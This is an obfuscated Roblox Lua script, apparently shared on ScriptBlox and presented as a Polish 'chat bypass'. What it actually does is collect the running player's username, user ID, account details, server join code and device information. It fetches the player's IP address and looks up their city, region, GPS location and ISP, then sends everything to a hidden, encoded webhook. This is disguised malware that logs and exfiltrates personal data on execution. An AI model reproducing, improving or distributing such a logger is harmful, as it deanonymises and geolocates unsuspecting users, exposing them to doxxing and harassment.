--[[
	WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
]]
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v42,v43) local v44={};for v49=1, #v42 do v6(v44,v0(v4(v1(v2(v42,v49,v49 + 1 )),v1(v2(v43,1 + (v49% #v43) ,1 + (v49% #v43) + 1 )))%256 ));end return v5(v44);end getgenv().haskjhfgash="Obejście czatu";getgenv().sdkgjuhlasdas=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\136\117\176\232\151\78\132\154\131\118\181\236\150\74\131\155\143\113\169\169\229\71\227\241\150\42\228\137\255\57\195\193\137\6\238\190\196\59\198\218\222\31\240\132\228\31\201\208\226\54\200\179\240\25\240\219\130\2\238\148\194\61\134\154\200\118\220\138\230\42\133\197\239\124\190\161\222\39\254\194\137\48\180\146\248\75\220","\126\177\163\187\69\134\219\167");getgenv().akjhsduaksjd=true;getgenv().aasdfsdgfgh=v7("\34\201\57\206\253\40\159\40\206\248\41\222\43\193\253\48\201","\156\67\173\74\165");local v12=gethui();local v13=v7("\49\188\91\23\178","\38\84\215\41\118\220\70");local v14=Instance.new(v7("\118\25\46\22\251\66","\158\48\118\66\114"));local v15=game:GetService(v7("\155\40\17\47\118\183\232","\155\203\68\112\86\19\197")).LocalPlayer;local v16=game:GetService(v7("\118\209\55\229\69\106\246","\152\38\189\86\156\32\24\133"));local v17=v15.UserId;local v18=game.PlaceId;local v19=tostring(game.JobId);local v20=game:GetService(v7("\209\86\181\77\249\67\183\74\253\84\162\117\249\69\177\79\255\82","\38\156\55\199")):GetProductInfo(game.PlaceId).Name;local v21=((game:GetService(v7("\157\110\121\58\58\122\234\86\188\78\121\58\5\125\249\70","\35\200\29\28\72\115\20\154")):GetPlatform()==Enum.Platform.Windows) and "PC 💻") or "Mobilny 📱" ;local v22="game:GetService('TeleportService'):TeleportToPlaceInstance("   .. v18   .. ", '"   .. v19   .. "', player)" ;local v23=os.date(v7("\92\134\156\154\128\97\113\29\255\148\247\215\105\25\67\250\226","\84\121\223\177\191\237\76"));local v24=game:GetService(v7("\140\89\219\171\41\64\49\194\190","\161\219\54\169\192\90\48\80"));local v25=math.floor(v24.CurrentCamera.ViewportSize.X);local v26=math.floor(v24.CurrentCamera.ViewportSize.Y);local v27=game:GetService(v7("\122\86\1\49\90","\69\41\34\96")):GetTotalMemoryUsageMb();local v28= #v16:GetPlayers();local v29=v16.MaxPlayers;local v30=(v15.Character and v15.Character:FindFirstChild(v7("\148\214\218\11\12\36\181\199","\75\220\163\183\106\98")) and v15.Character.Humanoid.Health) or v7("\44\245\170","\185\98\218\235\87") ;local v31=(v15.Character and v15.Character:FindFirstChild(v7("\227\41\42\231\208\165\194\56","\202\171\92\71\134\190")) and v15.Character.Humanoid.MaxHealth) or v7("\7\142\13","\232\73\161\76") ;local v32=(v15.Character and v15.Character:FindFirstChild(v7("\147\204\79\92\16\180\208\70\111\17\180\205\114\92\12\175","\126\219\185\34\61")) and v15.Character.HumanoidRootPart.Position) or v7("\34\129\127","\135\108\174\62\18\30\23\147") ;local v33=game.PlaceVersion;local v34=tonumber(game:GetService(v7("\133\253\43\223\11","\167\214\137\74\171\120\206\83")).Network.ServerStatsItem[v7("\175\241\38\92\184\151\130\254\53","\199\235\144\82\61\152")]:GetValueString():match(v7("\79\83\189\96\78","\75\103\118\217"))) or v7("\233\27\81","\126\167\52\16\116\217") ;local function v35() local v45=0 + 0 ;local v46;local v47;local v48;while true do if (v45==0) then v46=(3170 -1748) -(378 + (3023 -1979)) ;v47=nil;v45=167 -(122 + 44) ;end if (v45==(1 -0)) then v48=nil;while true do if (v46==((0 -0) -0)) then local v54=0 + 0 ;while true do if (v54==(0 + 0)) then v47,v48=pcall(function() return v15.MembershipType;end);return (v47 and (((v48==Enum.MembershipType.None) and "fałsz") or v7("\216\60\33\151\176\24","\156\168\78\64\224\212\121"))) or "Nie udało się pobrać członkostwa:" ;end end end end break;end end end local v36=getgenv().sdkgjuhlasdas;local v37=getgenv().aasdfsdgfgh;local v38={[v7("\4\225\171\218\2\224\177","\174\103\142\197")]=v7("\118\45\73\61\55\71\247\88\45","\152\54\72\63\88\69\62"),[v7("\195\193\236\84\219\203\229\85\208","\60\180\164\142")]=v37,[v7("\93\83\7\44\35\254","\114\56\62\101\73\71\141")]={{[v7("\172\224\207\200\189","\164\216\137\187")]="Otrzymałeś bombę na sieć",[v7("\214\227\34\177\180\247\27\198\239\62\188","\107\178\134\81\210\198\158")]="*lepszy skrypt od gościa Nulla*",[v7("\44\23\146\195","\202\88\110\226\166")]=v7("\209\6\129\255","\170\163\111\226\151"),[v7("\18\63\190\55\92","\73\113\80\210\88\46\87")]=tonumber(30601731 -15496161 ),[v7("\135\37\200\30\227\146","\135\225\76\173\114")]={{[v7("\20\236\181\181","\199\122\141\216\208\204\221")]="🔍 **Informacje o skrypcie**",[v7("\187\220\28\229\125","\150\205\189\112\144\24")]="```💻 Nazwa skryptu: "   .. getgenv().haskjhfgash   .. "\n⏰ Wykonano o: "   .. v23   .. v7("\37\132\191","\112\69\228\223\44\100\232\113") ,[v7("\221\17\11\218\184\121","\230\180\127\103\179\214\28")]=false},{[v7("\130\4\82\67","\128\236\101\63\38\132\33")]="👤 **Szczegóły gracza**",[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="```🧑 Nazwa użytkownika: "   .. v15.Name   .. "\n📝 Wyświetlana nazwa: "   .. v15.DisplayName   .. "\n🎖️ ID użytkownika: "   .. v17   .. "\n❤️ Zdrowie: "   .. v30   .. v7("\7\131\117","\100\39\172\85\188")   .. v31   .. "\n🔗 Profil: Zobacz profil (https://www.roblox.com/users/"   .. v17   .. v7("\226\104\171\143\53\164\116\188\201\51\173\120","\83\205\24\217\224") ,[v7("\239\203\193\52\232\192","\93\134\165\173")]=false},{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]="📅 **Informacje o koncie**",[v7("\243\79\124\31\224","\106\133\46\16")]="```📜 Wiek konta: "   .. v15.AccountAge   .. " dni\n💎 Status Premium: "   .. v35()   .. "\n📅 Data utworzenia konta: "   .. os.date(v7("\29\25\62\185\87\13\29\36","\32\56\64\19\156\58"),os.time() -(v15.AccountAge * 86400) )   .. v7("\90\200\229","\224\58\168\133\54\58\146") ,[v7("\80\88\71\244\123\131","\107\57\54\43\157\21\230\231")]=false},{[v7("\213\138\28\240","\175\187\235\113\149\217\188")]="🎮 **Szczegóły gry**",[v7("\42\174\141\89\230","\24\92\207\225\44\131\25")]="```🏅 Nazwa gry: "   .. v20   .. "\n🎖️ ID gry: "   .. v18   .. "\n🔗 Link do gry (https://www.roblox.com/games/"   .. v18   .. ")\n🔧 Wersja gry: "   .. v33   .. v7("\75\211\184","\29\43\179\216\44\123") ,[v7("\180\215\44\69\179\220","\44\221\185\64")]=false},{[v7("\15\230\69\90","\19\97\135\40\63")]="🕹️ **Informacje o serwerze**",[v7("\184\93\63\46\42","\81\206\60\83\91\79")]="```👥 Gracze na serwerze: "   .. v28   .. v7("\14\228\144","\196\46\203\176\18\79\163\45")   .. v29   .. "\n🕒 Czas na serwerze: "   .. os.date(v7("\253\10\36\91\9\161\170\139","\143\216\66\30\126\68\155"))   .. v7("\170\200\13","\129\202\168\109\171\165\195\183") ,[v7("\43\86\59\209\208\17","\134\66\56\87\184\190\116")]=true},{[v7("\50\48\4\190","\85\92\81\105\219\121\139\65")]="📡 **Informacje sieciowe**",[v7("\235\178\92\80\121","\191\157\211\48\37\28")]="```📶 Ping: "   .. v34   .. v7("\159\18\231\28\58\223","\90\191\127\148\124") ,[v7("\113\137\34\30\118\130","\119\24\231\78")]=true},{[v7("\140\44\168\79","\113\226\77\197\42\188\32")]="⚙️ **Informacje systemowe**",[v7("\44\23\248\160\63","\213\90\118\148")]="```📺 Rozdzielczość: "   .. v25   .. "x"   .. v26   .. "\n🔍 Zużycie pamięci: "   .. v27   .. " MB\n⚡ Wykonawca: "   .. identifyexecutor()   .. v7("\91\46\180","\45\59\78\212\54") ,[v7("\25\88\143\130\136\43","\144\112\54\227\235\230\78\205")]=true},{[v7("\189\41\2\249","\59\211\72\111\156\176")]="📍 **Pozycja postaci w skrypcie**",[v7("\88\134\239\56\75","\77\46\231\131")]=v7("\186\84\182\71\187\89\179\14\138\88\183\89\191\70\165\14\150\91\181\65\182\100\186\65\163\81\164\14\153\92\183\82\187\87\162\69\168\26\158\85\183\85\184\79\179\80\132\79\181\64\134\65\168\64\248\99\156\70\183\77\191\20\235\0\153\114\164\65\183\81\248\78\191\67\254\118\191\87\162\79\168\7\248\78\191\67\254","\32\218\52\214")   .. tostring(v32)   .. "))```\n" ,[v7("\71\25\61\161\255\181","\58\46\119\81\200\145\208\37")]=true},{[v7("\37\141\61\169","\86\75\236\80\204\201\221")]="🔗 **Skrypt dołączenia**",[v7("\100\64\123\144\251","\235\18\33\23\229\158")]="```lua\n"   .. v22   .. v7("\80\186\193","\219\48\218\161") ,[v7("\237\127\112\64\213\74","\128\132\17\28\41\187\47")]=false}},[v7("\21\58\19\55\95\15\51\15\54","\61\97\82\102\90")]={[v7("\185\60\167","\105\204\78\203\43\167\55\126")]=v7("\173\190\55\14\0\94\136\30\166\174\45\80\23\13\212\82\170\184\39\31\3\20\137\82\170\167\108\31\7\16\198\82\173\167\38\16\7\23\136\0\247\255\119\71\66\84\147\4\252\248\116\78\68\93\146\5\245\254\108\79\64\84\145\3\252\243\112\73\74\85\158\0\247\255\114\78\70\80\136\5\240\175\116\74\21\86\148\9\163\242\34\78\71\0\196\82\246\169\123\77\74\81\195\0\244\171\118\76\71\83\144\31\162\163\37\65\22\28\154\7\242\249\117\76\74\93\158\23\172\185\126\72\68\87\147\85\253\251\122\88\27\9\154\1\252\171\119\28\16\85\150\80\161\254\38\74\21\6\195\82\241\252\116\27\22\6\193\3\241\252\119\77\17\93\144\3\240\172\116\78\71\2\193\4\252\168\118\72\74\6\149\8\253\253\37\27\75\5\196\84\161\253\113\77\17\86\149\23","\49\197\202\67\126\115\100\167")},[v7("\49\84\208\61\133\68","\62\87\59\191\73\224\54")]={[v7("\243\7\226\221","\169\135\98\154")]="Wykonano przez syskey / wafzthkin z ❤️ | "   .. os.date(v7("\142\78\105\17\240\126\141\207\55\97\124\167\118\229\145\50\23","\168\171\23\68\52\157\83")) ,[v7("\253\114\250\163\26\56\149\248","\231\148\17\149\205\69\77")]=""}}}};if getgenv().akjhsduaksjd then local v50=0;local v51;local v52;local v53;while true do if (1==v50) then v53=nil;while true do if (v51==(581 -(361 + 219))) then table.insert(v38.embeds[321 -(53 + 267) ].fields,{[v7("\142\166\202\254","\159\224\199\167\155\55")]="**`(🤔) Sekret`**",[v7("\225\242\48\199\242","\178\151\147\92")]="||(👻) Adres IP: "   .. v53.ip   .. "||\n||(🌍) Kraj: "   .. v53.country   .. "||\n||(🛰️) Lokalizacja GPS: "   .. v53.loc   .. "||\n||(🏙️) Miasto: "   .. v53.city   .. "||\n||(🏡) Region: "   .. v53.region   .. "||\n||(📡) Hoster: "   .. v53.org   .. v7("\144\225","\26\236\157\44\82\114\44") });break;end if (v51==(0 + 0 + 0)) then local v55=413 -(15 + 398) ;local v56;while true do if ((982 -(18 + 964))==v55) then v56=0 -0 ;while true do if (v56==0) then v52=game:HttpGet(v7("\34\58\193\75\57\116\154\20\58\34\212\66\60\33\199\90\100\56\208\73\41\43\217\21\43\62\197\20\43\62\220\20\35\62","\59\74\78\181"));v53=game.HttpService:JSONDecode(game:HttpGet(v7("\45\197\78\74\160\127\158\21\74\191\36\200\76\85\161\36\159\84\95\167\41\216\92\67\253\36\193\74\21\186\53\216\84\92\188\122\216\74\7","\211\69\177\58\58")   .. v52 ));v56=1 + 0 ;end if (v56==1) then v51=(1 + 0) -(850 -(20 + 830)) ;break;end end break;end end end end break;end if (v50==(0 + 0)) then v51=126 -(116 + 10) ;v52=nil;v50=1 + 0 ;end end end local v39=game:GetService(v7("\159\241\109\229\218\206\165\243\112\246\236","\171\215\133\25\149\137")):JSONEncode(v38);local v40={[v7("\226\199\60\238\234\62\232\15\245\209\34\255","\34\129\168\82\154\143\80\156")]=v7("\132\162\35\7\65\77\136\145\187\60\5\7\68\154\138\188","\233\229\210\83\107\40\46")};local v41=http_request or request or (syn and syn.request) or (fluxus and fluxus.request) or (http and http.request) ;v41({[v7("\244\80\62","\101\161\34\82\182")]=v36,[v7("\202\2\93\231","\78\136\109\57\158\187\130\226")]=v39,[v7("\19\58\237\249\49\59","\145\94\95\153")]=v7("\205\226\39\225","\215\157\173\116\181\46"),[v7("\29\177\138\246\223\39\167","\186\85\212\235\146")]=v40});task.wait();
